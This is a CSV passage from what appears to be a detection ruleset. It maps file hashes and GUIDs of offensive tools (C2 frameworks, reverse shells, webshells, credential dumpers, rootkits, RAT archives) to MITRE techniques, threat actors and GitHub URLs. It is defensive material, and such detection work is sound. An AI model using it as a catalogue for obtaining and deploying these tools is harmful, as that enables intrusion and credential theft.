"*006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7*",".{0,1000}006c52fa111f12a54c8c543f5e7421f3841bae6d5a4e16054943a5aa5e9633b7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20663"
"*00758b7af992689b4d0b128b19582828b871c4332bfe1d9732d39118099b398b*",".{0,1000}00758b7af992689b4d0b128b19582828b871c4332bfe1d9732d39118099b398b.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","20666"
"*0075f7d5a315c6bf6d8bbe89a2481e673a8a61e79afbe89afd33e11634fd1caa*",".{0,1000}0075f7d5a315c6bf6d8bbe89a2481e673a8a61e79afbe89afd33e11634fd1caa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","20667"
"*00895d7e0a42f794de5f471a41c0cd996ee3298a4183834cb8b99f10552a5e1c*",".{0,1000}00895d7e0a42f794de5f471a41c0cd996ee3298a4183834cb8b99f10552a5e1c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","20669"
"*008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050*",".{0,1000}008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20670"
"*008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050*",".{0,1000}008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20671"
"*008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050*",".{0,1000}008edaedd37b477a5edd2475fc4e8793b03ec4cba503049a0db2114d4eb18050.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20672"
"*0095a4e305c7c32e6f8d906895a66a6a7563ea1b2ced2676a1a7af3cb2546e5a*",".{0,1000}0095a4e305c7c32e6f8d906895a66a6a7563ea1b2ced2676a1a7af3cb2546e5a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20673"
"*009cd370780fdcd4471165da2278c8bb65d4837457a253d4d4bd42e9d88e3e9f*",".{0,1000}009cd370780fdcd4471165da2278c8bb65d4837457a253d4d4bd42e9d88e3e9f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20676"
"*009e013613ce6435e4a83fadf560f9b19e3adbb774ae2d7daab7fef6e6bd586d*",".{0,1000}009e013613ce6435e4a83fadf560f9b19e3adbb774ae2d7daab7fef6e6bd586d.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","20677"
"*009f7df0ef3989ea2100166e4e56ec4182d3819f3027eadff3b53a50f20bc0c5*",".{0,1000}009f7df0ef3989ea2100166e4e56ec4182d3819f3027eadff3b53a50f20bc0c5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","20678"
"*00a2407eb70a40f0054d83e92cc9e8e85b010bfcc75ab5bab1ced62f81622d92*",".{0,1000}00a2407eb70a40f0054d83e92cc9e8e85b010bfcc75ab5bab1ced62f81622d92.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20679"
"*00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69*",".{0,1000}00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20680"
"*00ae099c6c9284ab4cccd689e66872e5683c2665e3f73936d6e1f98cf248c775*",".{0,1000}00ae099c6c9284ab4cccd689e66872e5683c2665e3f73936d6e1f98cf248c775.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20681"
"*00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552*",".{0,1000}00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","20684"
"*00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b*",".{0,1000}00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20685"
"*00bef672112754668bde734e62d22239737350e0d16b2984990f097d0db51c02*",".{0,1000}00bef672112754668bde734e62d22239737350e0d16b2984990f097d0db51c02.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","20686"
"*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20688"
"*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20689"
"*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20690"
"*00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a*",".{0,1000}00c868aae54b994cb537e54cb490d665a1d408d2634876bf2cedf4900a2d9c5a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20691"
"*00cce05cfc7ac3c284be62e98c8ffb25*",".{0,1000}00cce05cfc7ac3c284be62e98c8ffb25.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","20693"
"*00D7268A-92A9-4CD4-ADDF-175E9BF16AE0*",".{0,1000}00D7268A\-92A9\-4CD4\-ADDF\-175E9BF16AE0.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","20696"
"*00de5c3931a567291bf9893e217004b8d6d7fd834798e80a60c7e97ac9d1f346*",".{0,1000}00de5c3931a567291bf9893e217004b8d6d7fd834798e80a60c7e97ac9d1f346.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","20697"
"*00e574776767b1adaccff7b62bdb544633c806d5bde00c267edbcd3459e23d89*",".{0,1000}00e574776767b1adaccff7b62bdb544633c806d5bde00c267edbcd3459e23d89.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","20700"
"*00e5dee46223200a6ec5fe8cb742dfa3dbcab1738233944c7fc8b66fc56e10e1*",".{0,1000}00e5dee46223200a6ec5fe8cb742dfa3dbcab1738233944c7fc8b66fc56e10e1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20701"
"*00edd865b583264ec504752b1a3c233313808b9d531a0f850998fe01a9522de2*",".{0,1000}00edd865b583264ec504752b1a3c233313808b9d531a0f850998fe01a9522de2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20703"
"*00f30b9daeee37dd8ae0c6e0f61b14b3de19d45f504ba5d288f2a45dfe3cc652*",".{0,1000}00f30b9daeee37dd8ae0c6e0f61b14b3de19d45f504ba5d288f2a45dfe3cc652.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","20704"
"*00fb3eb58122daa2d401298b41db03757020c44cd4a41b664be65bec45008f63*",".{0,1000}00fb3eb58122daa2d401298b41db03757020c44cd4a41b664be65bec45008f63.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","20706"
"*00fe1c60b036ec30ac7334f710f0f923fdc5c702808cdda67c9d5a6fb2041ee8*",".{0,1000}00fe1c60b036ec30ac7334f710f0f923fdc5c702808cdda67c9d5a6fb2041ee8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20707"
"*01_all_exploits_have_payloads_test*",".{0,1000}01_all_exploits_have_payloads_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20709"
"*0105d13e4b33829b13ab839a9cad10f135b65528af0030a20060a190b3e2753f*",".{0,1000}0105d13e4b33829b13ab839a9cad10f135b65528af0030a20060a190b3e2753f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20710"
"*010eb2bab7b24ddaec85ddd15383b64286cf8791ba4556c465e806d7235eab1c*",".{0,1000}010eb2bab7b24ddaec85ddd15383b64286cf8791ba4556c465e806d7235eab1c.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20712"
"*013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8*",".{0,1000}013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20715"
"*014b459f4eff259806b56b536fd24475d1824a82213f2b4e174f7650c1cd81db*",".{0,1000}014b459f4eff259806b56b536fd24475d1824a82213f2b4e174f7650c1cd81db.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","20717"
"*0151aacf718ab65be46770339559ebaffa2cade02a77202d0cef37100856c95a*",".{0,1000}0151aacf718ab65be46770339559ebaffa2cade02a77202d0cef37100856c95a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20719"
"*015A37FC-53D0-499B-BFFE-AB88C5086040*",".{0,1000}015A37FC\-53D0\-499B\-BFFE\-AB88C5086040.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#GUIDproject","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","20722"
"*0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21*",".{0,1000}0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20723"
"*0164dc11b05124166f83da841b2cefbf91a8a1ee105820b416d9493263ebd222*",".{0,1000}0164dc11b05124166f83da841b2cefbf91a8a1ee105820b416d9493263ebd222.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","20725"
"*01723b5e0bb24057800417322796141865b8a5883c079ccd78dc0ffa9a3c496e*",".{0,1000}01723b5e0bb24057800417322796141865b8a5883c079ccd78dc0ffa9a3c496e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20728"
"*017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c*",".{0,1000}017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","20730"
"*01825b6b38ccd13900a4b83d2fb63f5246c775d05c032dc2d57c84c5b9940839*",".{0,1000}01825b6b38ccd13900a4b83d2fb63f5246c775d05c032dc2d57c84c5b9940839.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20733"
"*0186e7cb9cdc480d638db0c7c7ec42ce4b538e930a416b889cc3aed7d3938bbe*",".{0,1000}0186e7cb9cdc480d638db0c7c7ec42ce4b538e930a416b889cc3aed7d3938bbe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20736"
"*01871B2B-B006-4069-997D-BAB3EB216160*",".{0,1000}01871B2B\-B006\-4069\-997D\-BAB3EB216160.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","20737"
"*01883999ea47a8fba7b188d36915d6514cf6299692684547f7b9820310bc5f72*",".{0,1000}01883999ea47a8fba7b188d36915d6514cf6299692684547f7b9820310bc5f72.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20738"
"*018a8c1acc14adf544c2d05b066556e7b67e3756e30e928a4ff79cde74229086*",".{0,1000}018a8c1acc14adf544c2d05b066556e7b67e3756e30e928a4ff79cde74229086.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","20739"
"*018BD6D4-9019-42FD-8D3A-831B23B47CB2*",".{0,1000}018BD6D4\-9019\-42FD\-8D3A\-831B23B47CB2.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#GUIDproject","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","20740"
"*018bdc303d4d1d7ef36e50f7967e3adfc9e613dd51cda3865af30893bfcf5ea5*",".{0,1000}018bdc303d4d1d7ef36e50f7967e3adfc9e613dd51cda3865af30893bfcf5ea5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20741"
"*018cedf55d51bc510037225619f98f49b5138d842f3d375e1cd880bb102e047e*",".{0,1000}018cedf55d51bc510037225619f98f49b5138d842f3d375e1cd880bb102e047e.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","20742"
